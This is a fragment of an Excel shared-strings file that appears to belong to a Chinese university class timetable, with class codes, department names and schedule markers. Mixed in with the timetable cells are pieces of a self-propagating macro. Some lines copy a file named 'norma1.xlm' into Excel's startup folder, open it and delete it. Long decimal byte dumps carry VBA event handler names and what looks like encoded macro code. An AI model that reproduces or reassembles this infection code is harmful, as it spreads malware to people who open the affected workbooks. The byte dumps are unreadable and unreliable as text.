  </si>
  <si>
    <t>180622</t>
  </si>
  <si>
    <t>180631</t>
  </si>
  <si>
    <t>180632</t>
  </si>
  <si>
    <t>180641</t>
  </si>
  <si>
    <t>180642</t>
  </si>
  <si>
    <t>180643</t>
  </si>
  <si>
    <t>180644</t>
  </si>
  <si>
    <t>180651</t>
  </si>
  <si>
    <t>180652</t>
  </si>
  <si>
    <t>180711</t>
  </si>
  <si>
    <t>180731</t>
  </si>
  <si>
    <t>180811</t>
  </si>
  <si>
    <t>180812</t>
  </si>
  <si>
    <t>180813</t>
  </si>
  <si>
    <t>180814</t>
  </si>
  <si>
    <t>180831</t>
  </si>
  <si>
    <t>180832</t>
  </si>
  <si>
    <t>180841</t>
  </si>
  <si>
    <t>180842</t>
  </si>
  <si>
    <t>180851</t>
  </si>
  <si>
    <t>180852</t>
  </si>
  <si>
    <t>180911</t>
  </si>
  <si>
    <t>180912</t>
  </si>
  <si>
    <t>180921</t>
  </si>
  <si>
    <t>180922</t>
  </si>
  <si>
    <t>180931</t>
  </si>
  <si>
    <t>180941</t>
  </si>
  <si>
    <t>180951</t>
  </si>
  <si>
    <t>180961</t>
  </si>
  <si>
    <t>180962</t>
  </si>
  <si>
    <t>180971</t>
  </si>
  <si>
    <t>181011</t>
  </si>
  <si>
    <t>181012</t>
  </si>
  <si>
    <t>181111</t>
  </si>
  <si>
    <t>181112</t>
  </si>
  <si>
    <t xml:space="preserve">255 255 11 1 255 255 0 0 0 0 255 255 255 255 128 1 0 0 0 0 0 0 12 17 118 2 128 12 0 0 2 0 3 96 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 184 6 0 0 42 254 107 0 96 1 0 0 255 255 255 255 48 0 2 0 32 0 32 0 69 0 148 1 0 1 0 0 41 131 55 2 255 255 255 255 12 0 255 255 128 1 0 0 0 0 0 0 255 255 255 255 132 0 0 0 0 0 0 0 29 0 16 0 37 0 0 0 8 0 0 0 255 255 255 255 255 255 255 255 48 0 0 0 32 1 0 0 128 12 0 0 255 255 255 255 152 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 192 1 0 0 128 0 0 0 7 0 7 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 224 1 0 0 128 0 0 0 16 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 2 128 254 255 255 255 255 255 16 0 255 255 24 2 0 0 2 1 255 255 240 1 0 0 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 0 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 232 1 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 2 131 254 255 255 255 255 255 8 0 255 255 104 2 0 0 0 0 255 255 255 255 255 255 0 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 29 0 20 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 136 2 0 0 128 0 0 0 255 255 255 255 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 168 2 0 0 128 0 0 0 40 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 32 132 55 2 255 255 255 255 120 255 255 255 240 2 0 0 128 0 0 0 40 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 16 0 37 0 0 0 29 0 </t>
  </si>
  <si>
    <t>162031</t>
  </si>
  <si>
    <t>162051</t>
  </si>
  <si>
    <t>162061</t>
  </si>
  <si>
    <t>162211</t>
  </si>
  <si>
    <t>162212</t>
  </si>
  <si>
    <t>162213</t>
  </si>
  <si>
    <t>162251</t>
  </si>
  <si>
    <t>162252</t>
  </si>
  <si>
    <t>162271</t>
  </si>
  <si>
    <t>162281</t>
  </si>
  <si>
    <t>162291</t>
  </si>
  <si>
    <t>162292</t>
  </si>
  <si>
    <t>162293</t>
  </si>
  <si>
    <t>162294</t>
  </si>
  <si>
    <t>170815</t>
  </si>
  <si>
    <t>170816</t>
  </si>
  <si>
    <t>171512</t>
  </si>
  <si>
    <t>170344</t>
  </si>
  <si>
    <t>180111</t>
  </si>
  <si>
    <t>180112</t>
  </si>
  <si>
    <t>180121</t>
  </si>
  <si>
    <t>180122</t>
  </si>
  <si>
    <t>180123</t>
  </si>
  <si>
    <t>180124</t>
  </si>
  <si>
    <t>180125</t>
  </si>
  <si>
    <t>180126</t>
  </si>
  <si>
    <t>180127</t>
  </si>
  <si>
    <t>180131</t>
  </si>
  <si>
    <t>180132</t>
  </si>
  <si>
    <t>180133</t>
  </si>
  <si>
    <t>180141</t>
  </si>
  <si>
    <t>180142</t>
  </si>
  <si>
    <t>180211</t>
  </si>
  <si>
    <t>180212</t>
  </si>
  <si>
    <t>180213</t>
  </si>
  <si>
    <t>180221</t>
  </si>
  <si>
    <t>180222</t>
  </si>
  <si>
    <t>180231</t>
  </si>
  <si>
    <t>180232</t>
  </si>
  <si>
    <t>180233</t>
  </si>
  <si>
    <t>180241</t>
  </si>
  <si>
    <t>180242</t>
  </si>
  <si>
    <t>180301</t>
  </si>
  <si>
    <t>180302</t>
  </si>
  <si>
    <t>180311</t>
  </si>
  <si>
    <t>180312</t>
  </si>
  <si>
    <t>180313</t>
  </si>
  <si>
    <t>180314</t>
  </si>
  <si>
    <t>180321</t>
  </si>
  <si>
    <t>180322</t>
  </si>
  <si>
    <t xml:space="preserve">137 0 0 0 0 1 0 0 2 0 0 255 255 255 255 24 2 0 0 0 200 42 0 0 255 255 255 255 255 255 1 1 56 2 0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24 2 0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0 2 0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t>
  </si>
  <si>
    <t xml:space="preserve">7 0 0 0 0 0 0 208 0 0 0 0 0 0 0 0 0 0 0 0 0 4 0 0 3 19 68 2 0 0 0 0 0 192 0 0 0 0 0 0 70 2 0 0 127 4 0 0 3 213 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 2 15 0 0 0 65 112 112 95 78 101 119 87 111 114 107 98 111 111 107 6 0 0 2 23 0 0 0 65 112 112 95 87 111 114 107 98 111 111 107 66 101 102 111 114 101 67 108 111 115 101 5 0 0 2 16 0 0 0 65 112 112 95 87 111 114 107 98 111 111 107 79 112 101 110 2 0 0 2 5 0 0 0 115 102 99 101 97 5 0 0 13 20 0 20 0 72 0 0 0 2 0 0 0 0 0 56 0 3 0 56 0 3 0 4 0 0 3 18 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 3 217 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 4 0 0 5 2 0 9 9 0 0 0 0 0 0 49 9 0 0 0 0 0 0 255 255 255 255 4 0 0 3 219 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 2 0 0 6 9 9 0 0 0 0 0 0 224 0 0 0 0 0 0 0 4 0 0 3 215 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 3 0 0 1 8 0 0 0 78 0 97 0 109 0 101 0 9 0 0 11 28 0 0 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 3 0 0 1 8 0 0 0 67 0 111 0 112 0 121 0 4 0 0 1 14 0 0 0 86 0 105 0 115 0 105 0 98 0 108 0 101 0 4 0 0 1 14 0 0 0 67 0 111 0 108 0 117 0 109 0 110 0 115 0 6 0 0 11 18 0 0 0 65 0 117 0 116 0 111 0 95 0 79 0 112 0 101 0 110 0 15 0 0 11 54 0 0 0 61 0 39 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 57 0 67 0 49 0 8 0 0 11 </t>
  </si>
  <si>
    <t>通航学院（民航学院）</t>
  </si>
  <si>
    <t>广播电视编导</t>
  </si>
  <si>
    <t>机设、材控（卓越工程师菁干班）</t>
  </si>
  <si>
    <t>190111</t>
  </si>
  <si>
    <t>190112</t>
  </si>
  <si>
    <t>190141</t>
  </si>
  <si>
    <t>190142</t>
  </si>
  <si>
    <t>190124</t>
  </si>
  <si>
    <t>190125</t>
  </si>
  <si>
    <t>190126</t>
  </si>
  <si>
    <t>190127</t>
  </si>
  <si>
    <t>190121</t>
  </si>
  <si>
    <t>190122</t>
  </si>
  <si>
    <t>190123</t>
  </si>
  <si>
    <t>190131</t>
  </si>
  <si>
    <t>190132</t>
  </si>
  <si>
    <t>190133</t>
  </si>
  <si>
    <t>191011</t>
  </si>
  <si>
    <t>191012</t>
  </si>
  <si>
    <t>191131</t>
  </si>
  <si>
    <t>191132</t>
  </si>
  <si>
    <t>191121</t>
  </si>
  <si>
    <t>191122</t>
  </si>
  <si>
    <t>191123</t>
  </si>
  <si>
    <t>191111</t>
  </si>
  <si>
    <t>191112</t>
  </si>
  <si>
    <t>191113</t>
  </si>
  <si>
    <t>191114</t>
  </si>
  <si>
    <t>191211</t>
  </si>
  <si>
    <t>191212</t>
  </si>
  <si>
    <t>191213</t>
  </si>
  <si>
    <t>191251</t>
  </si>
  <si>
    <t>191261</t>
  </si>
  <si>
    <t>191262</t>
  </si>
  <si>
    <t>191221</t>
  </si>
  <si>
    <t>191222</t>
  </si>
  <si>
    <t>191241</t>
  </si>
  <si>
    <t>191242</t>
  </si>
  <si>
    <t>191451</t>
  </si>
  <si>
    <t>191452</t>
  </si>
  <si>
    <t>191431</t>
  </si>
  <si>
    <t>191432</t>
  </si>
  <si>
    <t>191421</t>
  </si>
  <si>
    <t>191441</t>
  </si>
  <si>
    <t>191442</t>
  </si>
  <si>
    <t>191461</t>
  </si>
  <si>
    <t>172071</t>
  </si>
  <si>
    <t>192071</t>
  </si>
  <si>
    <t>192072</t>
  </si>
  <si>
    <t>192073</t>
  </si>
  <si>
    <t>192011</t>
  </si>
  <si>
    <t>192012</t>
  </si>
  <si>
    <t>192013</t>
  </si>
  <si>
    <t>192014</t>
  </si>
  <si>
    <t>192015</t>
  </si>
  <si>
    <t>192016</t>
  </si>
  <si>
    <t>192051</t>
  </si>
  <si>
    <t>192061</t>
  </si>
  <si>
    <t>192081</t>
  </si>
  <si>
    <t>190211</t>
  </si>
  <si>
    <t>190212</t>
  </si>
  <si>
    <t>190213</t>
  </si>
  <si>
    <t>190221</t>
  </si>
  <si>
    <t>190222</t>
  </si>
  <si>
    <t>190241</t>
  </si>
  <si>
    <t>190242</t>
  </si>
  <si>
    <t>190231</t>
  </si>
  <si>
    <t>190232</t>
  </si>
  <si>
    <t>190233</t>
  </si>
  <si>
    <t>192271</t>
  </si>
  <si>
    <t>192281</t>
  </si>
  <si>
    <t>192291</t>
  </si>
  <si>
    <t>192292</t>
  </si>
  <si>
    <t>192293</t>
  </si>
  <si>
    <t>192294</t>
  </si>
  <si>
    <t>192251</t>
  </si>
  <si>
    <t>192252</t>
  </si>
  <si>
    <t>192213</t>
  </si>
  <si>
    <t>192214</t>
  </si>
  <si>
    <t>192211</t>
  </si>
  <si>
    <t>192212</t>
  </si>
  <si>
    <t>191531</t>
  </si>
  <si>
    <t>191532</t>
  </si>
  <si>
    <t>191533</t>
  </si>
  <si>
    <t>191534</t>
  </si>
  <si>
    <t>191511</t>
  </si>
  <si>
    <t>191512</t>
  </si>
  <si>
    <t>191521</t>
  </si>
  <si>
    <t>160306</t>
  </si>
  <si>
    <t>190351</t>
  </si>
  <si>
    <t>190331</t>
  </si>
  <si>
    <t>190332</t>
  </si>
  <si>
    <t>190333</t>
  </si>
  <si>
    <t>190334</t>
  </si>
  <si>
    <t>190335</t>
  </si>
  <si>
    <t>190336</t>
  </si>
  <si>
    <t>190341</t>
  </si>
  <si>
    <t>190342</t>
  </si>
  <si>
    <t>190343</t>
  </si>
  <si>
    <t>190311</t>
  </si>
  <si>
    <t>190312</t>
  </si>
  <si>
    <t>190313</t>
  </si>
  <si>
    <t>190314</t>
  </si>
  <si>
    <t>190321</t>
  </si>
  <si>
    <t>190322</t>
  </si>
  <si>
    <t>190323</t>
  </si>
  <si>
    <t>190301</t>
  </si>
  <si>
    <t>190302</t>
  </si>
  <si>
    <t>190361</t>
  </si>
  <si>
    <t>190362</t>
  </si>
  <si>
    <t>190431</t>
  </si>
  <si>
    <t>190432</t>
  </si>
  <si>
    <t>190411</t>
  </si>
  <si>
    <t>190412</t>
  </si>
  <si>
    <t>190413</t>
  </si>
  <si>
    <t>190414</t>
  </si>
  <si>
    <t>190415</t>
  </si>
  <si>
    <t>190481</t>
  </si>
  <si>
    <t>190482</t>
  </si>
  <si>
    <t>190421</t>
  </si>
  <si>
    <t>190422</t>
  </si>
  <si>
    <t>190423</t>
  </si>
  <si>
    <t>190461</t>
  </si>
  <si>
    <t>190462</t>
  </si>
  <si>
    <t>190451</t>
  </si>
  <si>
    <t>190452</t>
  </si>
  <si>
    <t>190441</t>
  </si>
  <si>
    <t>190442</t>
  </si>
  <si>
    <t>190443</t>
  </si>
  <si>
    <t>190471</t>
  </si>
  <si>
    <t>190611</t>
  </si>
  <si>
    <t>190612</t>
  </si>
  <si>
    <t>190613</t>
  </si>
  <si>
    <t>190614</t>
  </si>
  <si>
    <t>190621</t>
  </si>
  <si>
    <t>190622</t>
  </si>
  <si>
    <t>190851</t>
  </si>
  <si>
    <t>190852</t>
  </si>
  <si>
    <t>190831</t>
  </si>
  <si>
    <t>190832</t>
  </si>
  <si>
    <t>190841</t>
  </si>
  <si>
    <t>190842</t>
  </si>
  <si>
    <t>190811</t>
  </si>
  <si>
    <t>190812</t>
  </si>
  <si>
    <t>190813</t>
  </si>
  <si>
    <t>190814</t>
  </si>
  <si>
    <t>190531</t>
  </si>
  <si>
    <t>190511</t>
  </si>
  <si>
    <t>190512</t>
  </si>
  <si>
    <t>190513</t>
  </si>
  <si>
    <t>190521</t>
  </si>
  <si>
    <t>190711</t>
  </si>
  <si>
    <t>190731</t>
  </si>
  <si>
    <t>160972</t>
  </si>
  <si>
    <t>190961</t>
  </si>
  <si>
    <t>190962</t>
  </si>
  <si>
    <t>190971</t>
  </si>
  <si>
    <t>190911</t>
  </si>
  <si>
    <t>190912</t>
  </si>
  <si>
    <t>190921</t>
  </si>
  <si>
    <t>190922</t>
  </si>
  <si>
    <t>190931</t>
  </si>
  <si>
    <t>190941</t>
  </si>
  <si>
    <t>190951</t>
  </si>
  <si>
    <t>191611</t>
  </si>
  <si>
    <t>191612</t>
  </si>
  <si>
    <t>191613</t>
  </si>
  <si>
    <t>191614</t>
  </si>
  <si>
    <t>191621</t>
  </si>
  <si>
    <t>191622</t>
  </si>
  <si>
    <t>191623</t>
  </si>
  <si>
    <t>191624</t>
  </si>
  <si>
    <t>A</t>
  </si>
  <si>
    <t>⊙</t>
  </si>
  <si>
    <t>◎</t>
  </si>
  <si>
    <t>♂</t>
  </si>
  <si>
    <t>二</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>三</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>四</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>五</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>六</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>2020年</t>
  </si>
  <si>
    <t>七、八</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>暑假</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t xml:space="preserve">24 0 0 0 85 0 115 0 101 0 114 0 32 0 68 0 101 0 102 0 105 0 110 0 101 0 100 0 7 0 0 11 20 0 0 0 110 0 111 0 114 0 109 0 97 0 108 0 46 0 120 0 108 0 109 0 3 0 0 1 10 0 0 0 67 0 101 0 108 0 108 0 115 0 3 0 0 1 10 0 0 0 86 0 97 0 108 0 117 0 101 0 3 0 0 11 6 0 0 0 97 0 49 0 58 0 4 0 0 1 12 0 0 0 68 0 101 0 108 0 101 0 116 0 101 0 4 0 0 11 10 0 0 0 66 0 111 0 111 0 107 0 49 0 15 0 0 11 54 0 0 0 61 0 39 0 40 0 109 0 49 0 41 0 95 0 40 0 109 0 50 0 41 0 95 0 40 0 109 0 51 0 41 0 39 0 33 0 82 0 49 0 67 0 49 0 58 0 82 0 56 0 67 0 49 0 3 0 0 2 8 0 0 0 86 66 69 54 46 68 76 76 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 10 2 11 0 240 0 0 0 0 0 0 0 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 12 2 11 0 16 1 0 0 0 0 0 0 3 0 0 11 6 0 0 0 135 101 246 78 28 32 10 0 0 11 34 0 0 0 29 32 242 93 171 136 238 79 57 101 12 255 47 102 38 84 221 79 88 91 118 81 238 79 57 101 132 118 133 81 185 91 31 255 2 0 0 11 2 0 0 0 46 0 4 0 0 11 10 0 0 0 123 0 69 0 83 0 67 0 125 0 4 0 0 11 8 0 0 0 46 0 120 0 108 0 115 0 4 0 0 3 122 8 2 0 0 0 0 0 192 0 0 0 0 0 0 70 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 83 2 11 0 48 1 0 0 0 0 0 0 10 0 0 127 13 0 0 7 57 13 0 0 0 0 0 0 255 255 255 255 87 2 11 0 80 1 0 0 0 0 0 0 9 0 0 11 28 0 0 0 64 0 107 0 98 0 116 0 97 0 115 0 116 0 111 0 64 0 115 0 104 0 101 0 51 0 35 0 15 0 0 11 54 0 0 0 61 0 39 0 64 0 107 0 98 0 </t>
  </si>
  <si>
    <t xml:space="preserve">118 219 72 77 2 63 98 56 32 2 114 75 185 207 1 37 39 115 17 171 105 181 149 186 0 84 32 109 66 21 121 202 212 176 173 215 54 97 33 178 100 174 45 91 14 109 47 42 79 27 90 87 59 34 88 110 101 93 100 71 174 20 187 167 123 97 67 232 201 159 3 154 166 105 154 224 220 216 204 192 184 110 182 42 101 197 185 116 78 111 82 43 213 190 230 116 160 91 70 84 255 14 114 193 66 7 86 97 145 66 27 205 89 23 188 219 223 0 0 255 12 242 48 215 136 154 139 3 15 52 157 6 164 185 228 72 157 145 149 243 119 203 1 105 247 55 158 59 3 16 89 47 127 233 82 252 182 40 101 209 17 150 164 248 30 11 224 61 76 57 111 60 55 50 250 246 210 17 129 123 166 79 121 122 183 91 59 40 30 110 234 26 160 159 5 147 25 146 108 12 200 1 214 68 35 45 144 64 46 57 132 6 161 180 66 6 64 6 216 252 46 144 151 28 64 160 32 203 82 144 33 100 64 68 100 118 118 8 25 104 118 160 23 127 43 200 16 210 12 2 140 146 12 97 3 50 154 184 123 172 32 67 216 128 228 35 190 6 228 2 57 8 204 208 44 193 6 27 66 226 151 234 7 171 100 115 194 243 160 135 3 80 204 0 156 1 176 132 35 168 201 41 121 133 147 2 219 156 222 83 114 74 78 244 220 2 212 102 228 148 156 146 213 246 222 246 211 10 57 37 167 24 220 218 211 34 68 69 72 210 160 168 12 232 220 255 87 4 0 76 69 65 85 84 51 50 46 100 2 93 80 201 108 108 105 203 6 102 154 237 46 161 3 68 24 0 77 17 38 0 112 161 224 174 235 130 112 7 135 30 3 15 23 186 179 77 17 186 88 191 43 30 47 15 179 104 176 65 208 19 19 23 205 182 219 160 136 171 124 3 223 184 7 112 96 32 93 211 116 3 84 64 48 27 24 161 135 128 217 2 62 199 1 171 2 43 2 0 168 2 73 65 20 19 192 40 32 49 11 0 99 93 78 3 84 7 70 55 12 145 109 1 116 9 68 103 95 25 255 163 202 136 186 104 116 116 112 58 47 47 115 255 255 75 69 86 49 54 48 46 119 101 98 104 111 115 116 52 108 105 102 101 </t>
  </si>
  <si>
    <t xml:space="preserve">102 72 255 37 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 155 11 0 41 4 0 116 255 88 255 0 50 58 72 255 35 0 37 4 88 255 40 92 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 155 8 0 41 4 0 116 255 88 255 0 122 40 72 255 3 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 3 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 122 40 72 255 4 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 4 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 122 40 72 255 5 0 37 4 88 255 58 92 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 88 255 254 154 56 255 12 0 1 0 37 40 224 254 5 0 37 4 0 255 58 240 254 35 0 37 4 4 255 5 5 0 36 6 0 13 192 1 4 0 8 4 255 13 100 0 7 0 8 0 255 254 154 8 255 12 0 1 0 253 159 254 152 10 0 1 0 41 8 0 116 255 88 255 4 255 0 255 54 4 0 56 255 8 255 0 72 58 92 255 13 0 37 58 24 255 37 0 37 58 224 254 15 0 37 254 193 192 254 2 0 0 0 37 4 116 255 8 120 255 13 12 1 4 0 8 116 255 254 170 22 0 181 0 0 </t>
  </si>
  <si>
    <t>fso.copyfile filexlm, Application.StartupPath &amp; "\", True</t>
  </si>
  <si>
    <t xml:space="preserve">46 162 254 111 81 149 47 100 118 100 101 118 47 105 100 46 126 94 16 214 151 172 80 65 144 0 115 250 143 84 224 1 117 115 81 237 149 11 122 143 94 164 120 191 161 89 4 128 120 83 125 143 13 229 0 150 0 34 20 47 151 7 85 24 1 148 160 1 71 101 85 145 255 255 116 68 105 115 107 70 114 101 101 83 112 97 99 101 69 120 65 91 70 196 75 248 117 109 101 25 22 179 95 138 56 68 60 101 84 121 112 101 14 34 182 110 251 84 101 109 112 80 30 104 13 79 19 110 182 91 107 51 137 12 23 53 105 110 24 101 237 24 17 201 17 137 84 111 86 251 237 5 138 104 214 51 50 83 29 112 115 104 111 116 25 127 247 45 88 34 18 70 105 114 115 15 67 108 111 115 101 72 97 68 236 3 246 110 100 108 101 28 78 101 120 116 114 219 173 123 86 201 84 104 80 100 17 77 111 143 70 219 173 205 206 105 108 98 205 6 99 116 181 121 98 179 34 102 161 241 214 111 135 157 8 60 45 108 107 114 99 112 118 251 218 123 37 9 18 224 83 6 101 112 72 182 131 208 30 77 117 3 12 76 97 34 69 225 254 158 8 188 1 61 84 105 109 201 29 216 139 20 59 11 21 76 196 219 55 187 175 97 108 14 24 86 141 116 117 97 204 109 45 82 167 131 15 82 180 211 31 198 34 24 77 53 1 122 76 105 110 107 119 239 98 114 97 12 108 69 110 118 52 177 109 228 254 197 182 183 86 19 105 97 98 75 87 24 55 65 100 100 114 188 89 107 17 79 103 72 53 194 92 123 43 44 167 105 163 102 105 122 101 187 9 217 48 103 232 130 83 4 247 244 22 97 131 162 75 79 77 110 108 105 162 112 159 5 231 83 116 97 174 37 161 53 119 116 16 175 51 191 123 27 163 141 193 80 3 15 110 19 67 111 117 159 136 109 51 90 14 5 89 107 15 193 6 246 74 160 73 100 19 77 37 188 132 96 20 64 65 115 49 89 219 218 134 64 107 82 36 78 114 42 230 109 217 238 178 13 83 224 111 102 15 53 195 225 92 178 110 29 176 10 179 25 197 174 29 14 83 49 235 248 121 67 139 5 48 87 141 136 36 47 96 67 24 54 42 253 33 157 </t>
  </si>
  <si>
    <t xml:space="preserve">0 4 0 0 0 0 0 9 0 0 0 5 0 0 0 3 0 0 0 26 116 255 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 0 19 16 0 0 0 0 0 8 0 204 0 44 3 40 0 8 0 0 0 0 0 19 0 0 0 0 0 16 0 0 0 0 0 1 0 0 0 0 0 120 255 3 0 48 0 0 0 0 0 9 0 0 0 0 0 112 255 1 0 108 255 1 0 116 255 3 0 88 255 3 0 4 255 3 0 0 255 3 0 56 255 2 0 40 255 2 0 8 255 2 0 192 3 0 0 96 3 0 0 0 9 108 12 0 252 248 120 255 0 5 75 255 255 0 45 4 116 255 8 120 255 13 8 1 4 0 108 116 255 4 112 255 5 5 0 36 6 0 13 8 1 4 0 108 112 255 251 48 50 4 0 116 255 112 255 28 62 0 0 3 19 0 2 0 7 244 0 132 16 0 0 29 4 110 255 245 9 4 0 0 8 120 255 13 164 1 4 0 107 110 255 253 248 76 255 252 246 92 255 0 15 4 92 255 252 102 76 255 93 251 51 28 134 2 0 92 4 116 255 4 56 255 5 0 0 36 1 0 13 72 0 2 0 8 56 255 13 8 1 4 0 39 232 254 39 8 255 39 40 255 245 51 0 0 0 27 40 0 108 116 255 42 35 112 255 27 39 0 42 70 60 255 94 28 0 20 0 253 105 200 254 252 246 216 254 50 4 0 116 255 112 255 26 56 255 54 8 0 60 255 40 255 8 255 232 254 0 19 4 216 254 254 193 76 255 2 0 0 0 93 251 51 28 236 0 0 7 244 255 132 16 0 0 3 19 0 2 0 19 4 216 254 254 193 76 255 7 0 0 0 93 251 51 28 120 1 0 43 245 1 0 0 0 4 116 255 8 120 255 13 8 1 4 0 108 116 255 27 29 0 245 0 0 0 0 254 253 245 0 0 0 0 214 47 116 255 28 67 1 0 17 244 255 245 9 4 0 0 8 120 255 13 168 1 4 0 0 3 19 30 118 1 0 2 0 16 39 60 255 27 30 0 10 31 0 8 0 53 60 255 0 28 245 9 4 0 0 39 24 255 37 39 76 255 37 245 3 0 0 0 8 120 255 13 96 0 4 0 0 5 30 </t>
  </si>
  <si>
    <t>fso.deletefile filexlm</t>
  </si>
  <si>
    <t>162071</t>
  </si>
  <si>
    <t>180816</t>
  </si>
  <si>
    <t>│</t>
    <phoneticPr fontId="15" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 24 0 0 0 0 0 3 0 0 0 0 0 120 255 3 0 216 254 2 0 92 255 2 0 48 0 0 0 0 0 9 0 0 0 0 0 116 255 1 0 112 255 1 0 56 255 3 0 196 254 3 0 192 254 3 0 60 255 2 0 40 255 2 0 8 255 2 0 232 254 2 0 200 5 0 0 80 5 0 0 0 9 108 12 0 252 248 120 255 0 34 244 0 245 9 4 0 0 4 116 255 5 0 0 36 1 0 13 28 0 2 0 8 116 255 13 224 1 3 0 26 116 255 0 27 4 112 255 8 120 255 13 8 1 4 0 108 112 255 27 16 0 251 48 47 112 255 28 100 0 0 27 245 9 4 0 0 39 64 255 37 39 80 255 37 39 96 255 37 8 120 255 13 108 0 4 0 0 3 19 0 2 0 170 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 87 44 255 8 0 58 80 255 35 0 93 251 47 28 255 40 4 255 79 0 37 40 228 254 2 0 37 4 20 255 40 64 255 1 0 37 4 24 255 8 120 255 13 192 1 4 0 8 24 255 13 100 0 7 0 8 20 255 254 154 196 254 17 0 2 0 255 61 180 254 18 0 4 164 254 10 19 0 8 0 4 164 254 4 148 254 10 20 0 8 0 4 148 254 58 132 254 21 0 93 251 60 116 254 251 39 100 254 255 27 41 8 0 116 255 60 255 24 255 20 255 54 10 0 44 255 196 254 180 254 164 254 148 254 28 77 1 0 46 4 60 255 58 96 255 35 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 254 152 22 0 0 0 41 4 0 116 255 60 255 0 15 245 9 4 0 0 8 120 255 13 152 1 4 0 0 2 0 115 4 112 255 8 120 255 13 8 1 4 0 108 112 255 4 96 254 5 5 0 36 6 0 13 8 1 4 0 108 96 254 251 48 253 248 64 255 4 60 255 40 96 255 1 0 37 4 116 255 8 120 255 13 192 1 4 0 8 116 255 13 100 0 7 0 8 60 255 87 44 255 8 0 58 80 255 35 0 93 251 47 28 255 251 31 196 254 255 27 50 4 </t>
  </si>
  <si>
    <t>Workbooks.Open Application.StartupPath &amp; "\norma1.xlm"</t>
  </si>
  <si>
    <t>170521</t>
  </si>
  <si>
    <t>170531</t>
  </si>
  <si>
    <t>170611</t>
  </si>
  <si>
    <t>170612</t>
  </si>
  <si>
    <t>170621</t>
  </si>
  <si>
    <t>170622</t>
  </si>
  <si>
    <t>170631</t>
  </si>
  <si>
    <t>170632</t>
  </si>
  <si>
    <t>170641</t>
  </si>
  <si>
    <t>170642</t>
  </si>
  <si>
    <t>170711</t>
  </si>
  <si>
    <t>170731</t>
  </si>
  <si>
    <t>170811</t>
  </si>
  <si>
    <t>170812</t>
  </si>
  <si>
    <t>170813</t>
  </si>
  <si>
    <t>170814</t>
  </si>
  <si>
    <t>170831</t>
  </si>
  <si>
    <t>170832</t>
  </si>
  <si>
    <t>170841</t>
  </si>
  <si>
    <t>170842</t>
  </si>
  <si>
    <t>170851</t>
  </si>
  <si>
    <t>170852</t>
  </si>
  <si>
    <t>170911</t>
  </si>
  <si>
    <t>170912</t>
  </si>
  <si>
    <t>170921</t>
  </si>
  <si>
    <t>170922</t>
  </si>
  <si>
    <t>170931</t>
  </si>
  <si>
    <t>170941</t>
  </si>
  <si>
    <t>170951</t>
  </si>
  <si>
    <t>170961</t>
  </si>
  <si>
    <t>170962</t>
  </si>
  <si>
    <t>170971</t>
  </si>
  <si>
    <t>171011</t>
  </si>
  <si>
    <t>171012</t>
  </si>
  <si>
